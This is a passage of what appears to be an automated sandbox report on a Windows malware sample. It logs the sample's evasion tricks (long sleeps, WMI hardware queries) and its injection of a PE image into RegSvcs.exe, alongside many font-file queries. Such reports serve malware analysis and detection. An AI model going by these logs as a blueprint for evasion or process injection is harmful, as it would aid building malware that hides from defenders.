            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe TID: 5960 | Thread sleep time: -40023s >= -30000s
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe TID: 5980 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 642
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Thread delayed: delay time: 40023
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Thread delayed: delay time: 922337203685477
            Source: RegSvcs.exe, 00000001.00000003.292874133.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.528335523.0000000005B31000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6CB008
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Users\user\Desktop\g0PWOnCNZH.exe VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
